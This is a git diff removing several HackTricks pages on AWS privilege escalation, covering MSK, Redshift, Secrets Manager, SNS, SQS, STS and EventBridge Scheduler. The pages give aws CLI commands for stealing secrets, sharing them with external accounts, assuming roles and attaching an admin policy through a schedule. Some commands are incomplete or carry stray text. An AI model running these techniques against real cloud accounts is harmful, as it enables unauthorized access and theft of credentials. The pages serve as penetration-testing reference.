- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md deleted file mode 100644 index c5a09cb29..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md +++ /dev/null @@ -1,52 +0,0 @@ -# AWS - MSK Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## MSK - -For more information about MSK (Kafka) check: - -{% content-ref url="../aws-services/aws-msk-enum.md" %} -[aws-msk-enum.md](../aws-services/aws-msk-enum.md) -{% endcontent-ref %} - -### `msk:ListClusters`, `msk:UpdateSecurity` - -With these **privileges** and **access to the VPC where the kafka brokers are**, you could add the **None authentication** to access them. - -{% code overflow="wrap" %} -```bash -aws msk --client-authentication --cluster-arn --current-version -``` -{% endcode %} - -You need access to the VPC because **you cannot enable None authentication with Kafka publicly** exposed. If it's publicly exposed, if **SASL/SCRAM** authentication is used, you could **read the secret** to access (you will need additional privileges to read the secret).\ -If **IAM role-based authentication** is used and **kafka is publicly exposed** you could still abuse these privileges to give you permissions to access it. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md deleted file mode 100644 index 89b2282f2..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md +++ /dev/null @@ -1,44 +0,0 @@ -# AWS - Organizations Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Organizations - -For more information check: - -{% content-ref url="../aws-services/aws-organizations-enum.md" %} -[aws-organizations-enum.md](../aws-services/aws-organizations-enum.md) -{% endcontent-ref %} - -## From management Account to children accounts - -If you compromise the root/management account, chances are you can compromise all the children accounts.\ -To [**learn how check this page**](../#compromising-the-organization). - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md deleted file mode 100644 index e5098c244..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md +++ /dev/null @@ -1,135 +0,0 @@ -# AWS - Redshift Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Redshift - -For more information about RDS check: - -{% content-ref url="../aws-services/aws-redshift-enum.md" %} -[aws-redshift-enum.md](../aws-services/aws-redshift-enum.md) -{% endcontent-ref %} - -### `redshift:DescribeClusters`, `redshift:GetClusterCredentials` - -With these permissions you can get **info of all the clusters** (including name and cluster username) and **get credentials** to access it: - -```bash -# Get creds -aws redshift get-cluster-credentials --db-user postgres --cluster-identifier redshift-cluster-1 -# Connect, even if the password is a base64 string, that is the password -psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAM:" -d template1 -p 5439 -``` - -**Potential Impact:** Find sensitive info inside the databases. - -### `redshift:DescribeClusters`, `redshift:GetClusterCredentialsWithIAM` - -With these permissions you can get **info of all the clusters** and **get credentials** to access it.\ -Note that the postgres user will have the **permissions that the IAM identity** used to get the credentials has. - -```bash -# Get creds -aws redshift get-cluster-credentials-with-iam --cluster-identifier redshift-cluster-1 -# Connect, even if the password is a base64 string, that is the password -psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAMR:AWSReservedSSO_AdministratorAccess_4601154638985c45" -d template1 -p 5439 -``` - -**Potential Impact:** Find sensitive info inside the databases. - -### `redshift:DescribeClusters`, `redshift:ModifyCluster?` - -It's possible to **modify the master password** of the internal postgres (redshit) user from aws cli (I think those are the permissions you need but I haven't tested them yet): - -``` -aws redshift modify-cluster –cluster-identifier –master-user-password ‘master-password’; -``` - -**Potential Impact:** Find sensitive info inside the databases. 
- -## Accessing External Services - -{% hint style="warning" %} -To access all the following resources, you will need to **specify the role to use**. A Redshift cluster **can have assigned a list of AWS roles** that you can use **if you know the ARN** or you can just set "**default**" to use the default one assigned. - -Moreover, as [**explained here**](https://docs.aws.amazon.com/redshift/latest/mgmt/authorizing-redshift-service.html), Redshift also allows to concat roles (as long as the first one can assume the second one) to get further access but just **separating** them with a **comma**: `iam_role 'arn:aws:iam::123456789012:role/RoleA,arn:aws:iam::210987654321:role/RoleB';` -{% endhint %} - -### Lambdas - -As explained in [https://docs.aws.amazon.com/redshift/latest/dg/r\_CREATE\_EXTERNAL\_FUNCTION.html](https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html), it's possible to **call a lambda function from redshift** with something like: - -```sql -CREATE EXTERNAL FUNCTION exfunc_sum2(INT,INT) -RETURNS INT -STABLE -LAMBDA 'lambda_function' -IAM_ROLE default; -``` - -### S3 - -As explained in [https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html](https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html), it's possible to **read and write into S3 buckets**: - -```sql -# Read -copy table from 's3:///load/key_prefix' -credentials 'aws_iam_role=arn:aws:iam:::role/' -region '' -options; - -# Write -unload ('select * from venue') -to 's3://mybucket/tickit/unload/venue_' -iam_role default; -``` - -### Dynamo - -As explained in [https://docs.aws.amazon.com/redshift/latest/dg/t\_Loading-data-from-dynamodb.html](https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html), it's possible to **get data from dynamodb**: - -```sql -copy favoritemovies -from 'dynamodb://ProductCatalog' -iam_role 'arn:aws:iam::0123456789012:role/MyRedshiftRole'; -``` - -{% hint style="warning" %} -The 
Amazon DynamoDB table that provides the data must be created in the same AWS Region as your cluster unless you use the [REGION](https://docs.aws.amazon.com/redshift/latest/dg/copy-parameters-data-source-s3.html#copy-region) option to specify the AWS Region in which the Amazon DynamoDB table is located. -{% endhint %} - -### EMR - -Check [https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html](https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html) - -## References - -* [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md deleted file mode 100644 index 8be266ddb..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md +++ /dev/null @@ -1,75 +0,0 @@ -# AWS - Secrets Manager Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Secrets Manager - -For more info about secrets manager check: - -{% content-ref url="../aws-services/aws-secrets-manager-enum.md" %} -[aws-secrets-manager-enum.md](../aws-services/aws-secrets-manager-enum.md) -{% endcontent-ref %} - -### `secretsmanager:GetSecretValue` - -An attacker with this permission can get the **saved value inside a secret** in AWS **Secretsmanager**. - -```bash -aws secretsmanager get-secret-value --secret-id # Get value -``` - -**Potential Impact:** Access high sensitive data inside AWS secrets manager service. - -### `secretsmanager:GetResourcePolicy`, `secretsmanager:PutResourcePolicy`, (`secretsmanager:ListSecrets`) - -With the previous permissions it's possible to **give access to other principals/accounts (even external)** to access the **secret**. Note that in order to **read secrets encrypted** with a KMS key, the user also needs to have **access over the KMS key** (more info in the [KMS Enum page](../aws-services/aws-kms-enum.md)). - -```bash -aws secretsmanager list-secrets -aws secretsmanager get-resource-policy --secret-id -aws secretsmanager put-resource-policy --secret-id --resource-policy file:///tmp/policy.json -``` - -policy.json: - -```json -{ - "Version" : "2012-10-17", - "Statement" : [ { - "Effect" : "Allow", - "Principal" : { - "AWS" : "arn:aws:iam:::root" - }, - "Action" : "secretsmanager:GetSecretValue", - "Resource" : "*" - } ] -} -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md deleted file mode 100644 index bdbe2bea2..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md +++ /dev/null @@ -1,71 +0,0 @@ -# AWS - SNS Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## SNS - -For more information check: - -{% content-ref url="../aws-services/aws-sns-enum.md" %} -[aws-sns-enum.md](../aws-services/aws-sns-enum.md) -{% endcontent-ref %} - -### `sns:Publish` - -An attacker could send malicious or unwanted messages to the SNS topic, potentially causing data corruption, triggering unintended actions, or exhausting resources. - -```bash -aws sns publish --topic-arn --message -``` - -**Potential Impact**: Vulnerability exploitation, Data corruption, unintended actions, or resource exhaustion. - -### `sns:Subscribe` - -An attacker could subscribe or to an SNS topic, potentially gaining unauthorized access to messages or disrupting the normal functioning of applications relying on the topic. - -{% code overflow="wrap" %} -```bash -aws sns subscribe --topic-arn --protocol --endpoint -``` -{% endcode %} - -**Potential Impact**: Unauthorized access to messages (sensitve info), service disruption for applications relying on the affected topic. - -### `sns:AddPermission` - -An attacker could grant unauthorized users or services access to an SNS topic, potentially getting further permissions. - -```css -aws sns add-permission --topic-arn --label --aws-account-id --action-name -``` - -**Potential Impact**: Unauthorized access to the topic, message exposure, or topic manipulation by unauthorized users or services, disruption of normal functioning for applications relying on the topic. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md deleted file mode 100644 index 258084f11..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md +++ /dev/null @@ -1,74 +0,0 @@ -# AWS - SQS Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## SQS - -For more information check: - -{% content-ref url="../aws-services/aws-sqs-and-sns-enum.md" %} -[aws-sqs-and-sns-enum.md](../aws-services/aws-sqs-and-sns-enum.md) -{% endcontent-ref %} - -### `sqs:AddPermission` - -An attacker could use this permission to grant unauthorized users or services access to an SQS queue by creating new policies or modifying existing policies. This could result in unauthorized access to the messages in the queue or manipulation of the queue by unauthorized entities. - -{% code overflow="wrap" %} -```bash -cssCopy codeaws sqs add-permission --queue-url --actions --aws-account-ids --label -``` -{% endcode %} - -**Potential Impact**: Unauthorized access to the queue, message exposure, or queue manipulation by unauthorized users or services. - -### `sqs:SendMessage` , `sqs:SendMessageBatch` - -An attacker could send malicious or unwanted messages to the SQS queue, potentially causing data corruption, triggering unintended actions, or exhausting resources. - -```bash -aws sqs send-message --queue-url --message-body -aws sqs send-message-batch --queue-url --entries -``` - -**Potential Impact**: Vulnerability exploitation, Data corruption, unintended actions, or resource exhaustion. - -### `sqs:ReceiveMessage`, `sqs:DeleteMessage`, `sqs:ChangeMessageVisibility` - -An attacker could receive, delete, or modify the visibility of messages in an SQS queue, causing message loss, data corruption, or service disruption for applications relying on those messages. - -```bash -aws sqs receive-message --queue-url -aws sqs delete-message --queue-url --receipt-handle -aws sqs change-message-visibility --queue-url --receipt-handle --visibility-timeout -``` - -**Potential Impact**: Steal sensitive information, Message loss, data corruption, and service disruption for applications relying on the affected messages. 
- -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md deleted file mode 100644 index 1162ac6fe..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md +++ /dev/null @@ -1,153 +0,0 @@ -# AWS - STS Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## STS - -### `sts:AssumeRole` - -Every role is created with a **role trust policy**, this policy indicates **who can assume the created role**. If a role from the **same account** says that an account can assume it, it means that the account will be able to access the role (and potentially **privesc**). - -For example, the following role trust policy indicates that anyone can assume it, therefore **any user will be able to privesc** to the permissions associated with that role. - -```json -{ - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": "sts:AssumeRole" - } - ] -} -``` - -You can impersonate a role running: - -```bash -aws sts assume-role --role-arn $ROLE_ARN --role-session-name sessionname -``` - -**Potential Impact:** Privesc to the role. - -{% hint style="danger" %} -Note that in this case the permission `sts:AssumeRole` needs to be **indicated in the role to abuse** and not in a policy belonging to the attacker.\ -With one exception, in order to **assume a role from a different account** the attacker account **also needs** to have the **`sts:AssumeRole`** over the role. 
-{% endhint %} - -### **`sts:GetFederationToken`** - -With this permission it's possible to generate credentials to impersonate any user: - -```bash -aws sts get-federation-token --name -``` - -This is how this permission can be given securely without giving access to impersonate other users: - -```json -{ - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "VisualEditor0", - "Effect": "Allow", - "Action": "sts:GetFederationToken", - "Resource": "arn:aws:sts::947247140022:federated-user/${aws:username}" - } - ] -} -``` - -### `sts:AssumeRoleWithSAML` - -A trust policy with this role grants **users authenticated via SAML access to impersonate the role.** - -An example of a trust policy with this permission is: - -```json -{ - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "OneLogin", - "Effect": "Allow", - "Principal": { - "Federated": "arn:aws:iam::290594632123:saml-provider/OneLogin" - }, - "Action": "sts:AssumeRoleWithSAML", - "Condition": { - "StringEquals": { - "SAML:aud": "https://signin.aws.amazon.com/saml" - } - } - } - ] -} -``` - -To generate credentials to impersonate the role in general you could use something like: - -```bash -aws sts assume-role-with-saml --role-arn --principal-arn -``` - -But **providers** might have their **own tools** to make this easier, like [onelogin-aws-assume-role](https://github.com/onelogin/onelogin-python-aws-assume-role): - -{% code overflow="wrap" %} -```bash -onelogin-aws-assume-role --onelogin-subdomain mettle --onelogin-app-id 283740 --aws-region eu-west-1 -z 3600 -``` -{% endcode %} - -**Potential Impact:** Privesc to the role. - -### `sts:AssumeRoleWithWebIdentity` - -This permission grants permission to obtain a set of temporary security credentials for **users who have been authenticated in a mobile, web application, EKS...** with a web identity provider. 
[Learn more here.](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithWebIdentity.html) - -For example, if an **EKS service account** should be able to **impersonate an IAM role**, it will have a token in **`/var/run/secrets/eks.amazonaws.com/serviceaccount/token`** and can **assume the role and get credentials** doing something like: - -{% code overflow="wrap" %} -```bash -aws sts assume-role-with-web-identity --role-arn arn:aws:iam::123456789098:role/ --role-session-name something --web-identity-token file:///var/run/secrets/eks.amazonaws.com/serviceaccount/token -# The role name can be found in the metadata of the configuration of the pod -``` -{% endcode %} - -### Federation Abuse - -{% content-ref url="../aws-basic-information/aws-federation-abuse.md" %} -[aws-federation-abuse.md](../aws-basic-information/aws-federation-abuse.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md b/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md deleted file mode 100644 index 9173fadf5..000000000 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/eventbridgescheduler-privesc.md +++ /dev/null @@ -1,75 +0,0 @@ -# AWS - EventBridge Scheduler Privesc - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## EventBridge Scheduler - -More info EventBridge Scheduler in: - -{% content-ref url="../aws-services/eventbridgescheduler-enum.md" %} -[eventbridgescheduler-enum.md](../aws-services/eventbridgescheduler-enum.md) -{% endcontent-ref %} - -### `iam:PassRole`, (`scheduler:CreateSchedule` | `scheduler:UpdateSchedule`) - -An attacker with those permissions will be able to **`create`|`update` an scheduler and abuse the permissions of the scheduler role** attached to it to perform any action - -For example, they could configure the schedule to **invoke a Lambda function** which is a templated action: - -```bash -aws scheduler create-schedule \ - --name MyLambdaSchedule \ - --schedule-expression "rate(5 minutes)" \ - --flexible-time-window "Mode=OFF" \ - --target '{ - "Arn": "arn:aws:lambda:::function:", - "RoleArn": "arn:aws:iam:::role/" - }' -``` - -In addition to templated service actions, you can use **universal targets** in EventBridge Scheduler to invoke a wide range of API operations for many AWS services. Universal targets offer flexibility to invoke almost any API. 
One example can be using universal targets adding "**AdminAccessPolicy**", using a role that has "**putRolePolicy**" policy: - -```bash -aws scheduler create-schedule \ - --name GrantAdminToTargetRoleSchedule \ - --schedule-expression "rate(5 minutes)" \ - --flexible-time-window "Mode=OFF" \ - --target '{ - "Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy", - "RoleArn": "arn:aws:iam:::role/RoleWithPutPolicy", - "Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}" - }' -``` - -## References - -* [https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html) -* [https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
